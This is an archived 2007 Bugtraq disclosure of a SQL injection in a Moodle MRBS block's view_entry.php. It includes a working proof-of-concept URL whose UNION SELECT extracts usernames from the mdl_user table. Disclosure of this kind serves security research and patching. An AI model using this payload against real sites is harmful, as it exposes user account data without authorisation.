[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Moodle SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Moodle SQL Injection
From: root@xxxxxxxxxxx
Date: 21 Dec 2007 10:04:31 -0000

Moodle.org

PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=[SQL]&day=27&month=10&year=2007

And a POC:
PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007

Prev by Date: [USN-559-1] MySQL vulnerabilities
Next by Date: Cryptome: NSA has real-time access to Hushmail servers
Previous by thread: [USN-559-1] MySQL vulnerabilities
Next by thread: Re: Moodle SQL Injection
Index(es):
- Date
- Thread